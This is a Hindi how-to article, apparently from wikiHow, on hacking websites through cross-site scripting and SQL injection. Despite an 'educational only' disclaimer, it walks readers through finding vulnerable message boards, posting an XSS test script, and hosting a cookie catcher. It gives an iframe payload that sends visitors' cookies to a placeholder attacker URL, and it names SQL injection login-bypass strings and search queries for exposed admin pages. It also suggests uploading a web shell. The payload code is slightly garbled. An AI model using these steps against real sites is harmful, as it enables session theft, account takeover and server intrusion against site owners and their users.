कभी आपने यह जानना चाहा है कि किसी वेबसाइट को किस तरह हैक किया जा सकता है? हालांकि प्रत्येक साइट को हैक कर पाना तो संभव नहीं होता है, मगर आप मेसेज बोर्ड जैसी किसी वलनरेबल (vulnerable) साइट को हैक कर सकते हैं। विकिहाउ के इस आर्टिकल में यह सिखाया गया है कि किस तरह से क्रॉस स्क्रिप्ट राइटिंग तथा इंजेक्शन अटैक्स के जरिये से आप किसी साइट को हैक कर सकते हैं। इसमें आपको ये टिप्स भी दी गई हैं कि आप सफलता पाने के लिए अपने आप को किस तरह सेट कर सकते हैं। नोट: यह ट्यूटोरियल सिर्फ एजुकेशनल उद्देश्य से है। इससे या तो लोगों को व्हाइट हैट हैकिंग सीखने में सहायता मिलेगी या यह देख कर कि हैकर्स किस तरह काम करते हैं, लोग अपनी साइट्स की बेहतर सुरक्षा कर सकेंगे। इस ट्यूटोरियल में हैकिंग के दो तरीके समझाये गए हैं, क्रॉस स्क्रिप्ट राइटिंग तथा SQL इंजेक्शन।
चरण
-
कोई ऐसी हैक करने योग्य (vulnerable) साइट खोजिए जहां आप कंटेन्ट पोस्ट कर सकते हों: कोई मेसेज बोर्ड इसका बढ़िया उदाहरण होगा। याद रखिए, अगर यह साइट क्रॉस स्क्रिप्ट राइटिंग के लिए वलनरेबल नहीं होगी, तब यह तरीका काम नहीं करेगा।
-
कोई पोस्ट क्रिएट करिए: आपको उस "पोस्ट" में एक विशेष कोड टाइप करना होगा जो कि उस उनका सभी का डेटा कैप्चर कर लेगा, जो वहाँ क्लिक करेंगे।
- आपको यह देखने के लिए टेस्ट करना होगा कि क्या सिस्टम उस कोड को फ़िल्टर आउट कर देता है। पोस्ट करिए
<script>window.alert("test")</script>
अगर आपके पोस्ट पर क्लिक करने से कोई अलर्ट बॉक्स सामने आ जाता है, तब साइट अटैक के लिए वलनरेबल है।
- आपको यह देखने के लिए टेस्ट करना होगा कि क्या सिस्टम उस कोड को फ़िल्टर आउट कर देता है। पोस्ट करिए
-
अपना कुकी कैचर बनाइये और उसे अपलोड करिए: इस अटैक का लक्ष्य है कि यूज़र्स की कुकीज़ को कैप्चर कर लिया जाये, जिससे आपको उनके वलनरेबल लॉगइन वाली वेबसाइट्स के अकाउंट्स में एक्सेस मिल सके। आपको एक कुकी कैचर की ज़रूरत पड़ेगी, जो आपके टार्गेट की कुकीज़ को कैप्चर करके उनको रीराउट (reroute) कर देगा। कैचर को ऐसी वेबसाइट में अपलोड कर दीजिये जिसमें आपकी एक्सेस हो, और जो अपलोड द्वारा रिमोट कोड एक्ज़ीक्यूशन के लिए वलनरेबल हो।
-
अपने कुकी कैचर के साथ पोस्ट करिए: पोस्ट में एक उचित कोड इनपुट करिए जो कि कुकीज़ को कैप्चर करके आपकी साइट पर भेज देगा। संदेह को कम करने के लिए आप चाहेंगे, कि कोड के बाद कुछ टेक्स्ट भी रखें, जिससे कि आपकी पोस्ट डिलीट न कर दी जाये।
- कोड का एक उदाहरण हो सकता है
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
- कोड का एक उदाहरण हो सकता है
-
कलेक्ट की हुई कुकीज़ का इस्तेमाल करिए: इसके बाद आप कुकी जानकारी, जिसे आपकी वेबसाइट पर सेव किया जाना चाहिए, का इस्तेमाल मनचाहे उद्देश्य के लिए कर सकते हैं।
इंजेक्शन अटैक्स को एक्ज़ीक्यूट करना (Executing Injection Attacks)
-
कोई वलनरेबल साइट खोजिए: आपको कोई ऐसी साइट खोजनी होगी, जो आसानी से एक्सेसिबल एडमिन लॉगइन के कारण वलनरेबल हो। अपने मनपसंद सर्च इंजन पर admin login.asp या admin login.php खोजने की कोशिश करिए।
-
एडमिन की तरह लॉगइन करिए: यूजरनेम में एडमिन टाइप करिए तथा विभिन्न नंबर स्ट्रिंग्स में से किसी एक को पासवर्ड की तरह इस्तेमाल करिए। यह विभिन्न स्ट्रिंग्स में कोई भी एक हो सकता है मगर 1'या'1'='1 या 2'='2 एक कॉमन उदाहरण है।
-
धैर्य रखिए: इसमें शायद थोड़ी ट्रायल और एरर की ज़रूरत पड़ेगी।
-
वेबसाइट को एक्सेस करिए: यह मानते हुये कि वेबसाइट अटैक के लिए वलनरेबल है, कभी न कभी आपको वह स्ट्रिंग मिल ही जाएगी जिससे आप वेबसाइट में एडमिन एक्सेस पा सकेंगे। उसके बाद एडमिनिस्ट्रेटर के रूप में लॉग इन हो कर आप आगे की कार्यवाहियाँ कर सकते हैं, जैसे कि अगर आप फ़ाइल अपलोड कर सकेंगे तो सर्वर साइड एक्सेस पाने के लिए वेब शेल को अपलोड कर सकेंगे।
-
एक या दो प्रोग्रामिंग लैंगवेज़ सीखना: अगर आप सचमुच में सीखना चाहते हैं कि किस प्रकार वेबसाइट्स को हैक किया जाये, तब आपको समझना होगा कि कंप्यूटर और अन्य टेक्नॉलॉजी किस प्रकार काम करती है। Python, PHP (सर्वर-साइड वलनरेबिलिटीज़ को एक्सप्लोइट करने के लिए आवश्यक) या SQL जैसी प्रोग्रामिंग लैंगवेजेज़ का इस्तेमाल करना सीखिये, ताकि आप कम्प्यूटर्स पर बेहतर नियंत्रण बना सकें और सिस्टम्स में वलनरेबिलिटीज़ को पहचान सकें।
-
बेसिक एचटीएमएल लिटरेसी प्राप्त करिए: अगर आप खास तौर पर वेबसाइट्स को ही हैक करना चाहते हैं, तब आपको HTML तथा JavaScript की अच्छी समझ होनी चाहिए। इसे सीखने में समय लग सकता है, मगर इसको मुफ़्त में सीखने के लिए इन्टरनेट पर बहुत से तरीके उपलब्ध हैं, इसलिए अगर आप चाहेंगे, तब आपको निस्संदेह इसके अनेक अवसर मिल जाएँगे।
-
व्हाइटहैट्स से कंसल्ट करिए: व्हाइटहैट्स वे हैकर होते हैं जो अपनी पावर का इस्तेमाल अच्छाई के लिए, सिक्यूरिटी वलनरेबिलिटीज़ को एक्सपोज़ करने के लिए, और इंटनेट को सभी के लिए एक बेहतर जगह बनाने के लिए करते हैं। अगर आप हैक करना इसलिए सीख रहे हैं ताकि अपनी पावर का इस्तेमाल भलाई के लिए कर सकें या आप अपनी वेबसाइट को प्रोटेक्ट करना चाहते हैं, तब शायद सुझाव आदि पाने के लिए कुछ करेंट व्हाइटहैट्स से कॉन्टेक्ट करना चाहेंगे।
-
हैकिंग पर रिसर्च करिए: अगर आप हैक करना सीखना चाहते हैं या केवल ख़ुद को प्रोटेक्ट करना चाहते हैं, आपको बहुत रिसर्च करनी पड़ेगी। ऐसे अनेक तरीके हैं जिनसे वेबसाइट्स वलनरेबल हो सकती हैं और इन तरीकों की लिस्ट लगातार बदलती रहती है, इसलिए आपको लगातार सीखते रहना पड़ेगा।
-
अप टू डेट रहिए: चूंकि संभावित हैक्स की लिस्ट हमेशा बदलती रहती है, और नई वलनरेबिलिटीज़ की खोज होती रहती है, आपको यह सुनिश्चित करना होगा कि आप अप टू डेट रहें। केवल इसलिए कि आप अभी किसी एक प्रकार के हैक से प्रोटेक्टेड हैं इसका यह मतलब नहीं है कि आप भविष्य में भी सुरक्षित रहेंगे।
सलाह
- अनेक ऐसी सलाहें पाने के लिए, जो आपकी मदद करेंगी, आप हैकर फ़ोरम्स में जाइए।
- यह ट्यूटोरियल शुद्ध रूप से केवल एजुकेशनल उद्देश्य से है। इससे या तो लोगों को व्हाइट हैट हैकिंग सीखने में सहायता मिलेगी या यह देख कर कि हैकर्स किस तरह काम करते हैं, लोग अपनी साइट्स की बेहतर सुरक्षा कर सकेंगे।
चेतावनी
- इस लेख को पढ़ने के तुरंत बाद आप हैकर नहीं बन जाएँगे। आपको अपनी स्किल्स को एक्सप्लोर करना है, और अभ्यास करते ही रहना है।